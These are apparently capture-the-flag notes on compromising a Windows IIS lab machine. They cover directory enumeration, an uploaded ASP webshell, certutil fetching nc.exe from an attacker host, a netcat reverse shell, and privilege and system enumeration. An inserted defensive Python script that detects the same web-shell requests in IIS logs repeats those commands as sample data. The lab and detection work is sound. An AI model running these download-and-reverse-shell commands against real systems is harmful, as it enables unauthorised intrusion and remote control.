8 :80
http://10.10.10.116/
IIS 10.0 landing page
$ gobuster dir -u http://10.10.10.116 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x aspx,asp,html,txt
===============================================================
/upload (Status: 301) [Size: 150] [--> http://10.10.10.116/upload/]
http://10.10.10.116/upload/
# shows kashz.txt that we uploaded.
# .aspx => FAIL
| (Warning: Do not create a MIME map for content that users should not download, such as .ASPX pages or .config files.)
# usual .asp shells not working
Using https://github.com/tennc/webshell/blob/master/asp/webshell.asp
> works
# it's x64, using nc to get a stable shell
http://10.10.10.116/upload/webshell.asp?cmd=certutil.exe -urlcache -f http://10.10.16.7/nc.exe C:\Users\Public\nc.exe
http://10.10.10.116/upload/webshell.asp?cmd=C:\Users\Public\nc.exe -e cmd.exe 10.10.16.7 6969
$ nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.116] 49676
Microsoft Windows [Version 10.0.15063]
(c) 2017 Microsoft Corporation. All rights reserved.
C:\Windows\SysWOW64\inetsrv>whoami
conceal\destitute
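Added example, not part of these notes: a defender-side Python check that flags the request pattern above (a server-side script executed out of the writable /upload/ directory with a cmd= query carrying certutil or nc) in IIS W3C logs. The log lines are constructed and the field list assumes a typical IIS #Fields header.

```python
import re
from urllib.parse import unquote

# Constructed IIS W3C sample: an upload-dir listing, the two web-shell
# requests from the notes (tool download, then reverse shell), and a benign hit.
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs-Referer sc-status sc-substatus sc-win32-status time-taken
2019-01-01 10:00:01 10.10.10.116 GET /upload/ - 80 - 10.10.16.7 Mozilla/5.0 - 200 0 0 12
2019-01-01 10:00:05 10.10.10.116 GET /upload/webshell.asp cmd=certutil.exe+-urlcache+-f+http://10.10.16.7/nc.exe+C:\\Users\\Public\\nc.exe 80 - 10.10.16.7 Mozilla/5.0 - 200 0 0 340
2019-01-01 10:00:09 10.10.10.116 GET /upload/webshell.asp cmd=C:\\Users\\Public\\nc.exe+-e+cmd.exe+10.10.16.7+6969 80 - 10.10.16.7 Mozilla/5.0 - 200 0 0 9001
2019-01-01 10:00:20 10.10.10.116 GET /index.html - 80 - 10.10.16.7 Mozilla/5.0 - 200 0 0 3
"""

# Signals taken from the steps in these notes.
SCRIPT_IN_UPLOAD = re.compile(r"^/upload/.*\.aspx?$", re.IGNORECASE)
CMD_PARAM = re.compile(r"(^|&)cmd=", re.IGNORECASE)
SUSPICIOUS_TOKENS = ("certutil", "-urlcache", "nc.exe", "-e cmd.exe", "powershell")

def parse_w3c(text):
    """Yield one dict per log record, keyed by the names in the #Fields line."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or not line.strip() or fields is None:
            continue
        parts = line.split()
        if len(parts) == len(fields):
            yield dict(zip(fields, parts))

def find_webshell_activity(text):
    """Return (time, client_ip, uri, decoded_query, reasons) for suspect requests."""
    hits = []
    for rec in parse_w3c(text):
        uri, query = rec["cs-uri-stem"], rec["cs-uri-query"]
        decoded = unquote(query.replace("+", " "))  # IIS logs keep the query URL-encoded
        reasons = []
        if SCRIPT_IN_UPLOAD.search(uri):
            reasons.append("script executed from upload dir")
        if CMD_PARAM.search(query):
            reasons.append("cmd parameter")
        tokens = [t for t in SUSPICIOUS_TOKENS if t in decoded.lower()]
        if tokens:
            reasons.append("tooling: " + ", ".join(tokens))
        # Two independent signals keep a lone directory listing from alerting.
        if len(reasons) >= 2:
            hits.append((rec["time"], rec["c-ip"], uri, decoded, reasons))
    return hits

if __name__ == "__main__":
    for hit in find_webshell_activity(SAMPLE_LOG):
        print(hit)
```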
C:\Windows\SysWOW64\inetsrv>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
C:\Windows\SysWOW64\inetsrv>systeminfo
Host Name: CONCEAL
OS Name: Microsoft Windows 10 Enterprise
OS Version: 10.0.15063 N/A Build 15063
System Type: x64-based PC
Hotfix(s): N/A